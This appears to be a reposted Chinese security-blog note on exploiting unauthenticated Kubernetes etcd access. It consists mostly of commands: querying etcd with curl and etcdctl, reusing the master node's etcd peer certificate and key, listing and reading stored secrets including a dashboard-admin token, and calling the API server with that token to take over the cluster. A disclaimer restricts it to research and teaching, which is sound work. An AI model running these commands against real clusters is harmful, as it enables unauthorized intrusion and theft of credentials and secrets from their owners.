#使用curl访问
curl https://172.16.200.70:2379/version -k
#使用etcdctl访问
./etcdctl --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only
#目标master节点上的证书
/etc/kubernetes/pki/etcd/peer.crt
/etc/kubernetes/pki/etcd/ca.crt
/etc/kubernetes/pki/etcd/peer.key
#将这三个认证所需的文件放在本地的etcdctl所在目录,然后导入
export ETCDCTL_CERT=peer.crt
export ETCDCTL_CACERT=ca.crt
export ETCDCTL_KEY=peer.key
./etcdctl --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only
etcd未授权访问
{etcdserver: "3.2.24", etcdcluster: "3.2.0"}
或
{"action":"get","node":{"dir":true}}
查找Token,接管K8s集群
#查找所有的secret
ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only|sort|uniq| grep secret
#查找指定decret保存的证书和token
ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp
curl --header "Authorization: Token" -X GET https://172.16.200.70:6443/api -k
End
原文始发于微信公众号(谢公子学安全):K8s etcd未授权访问
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论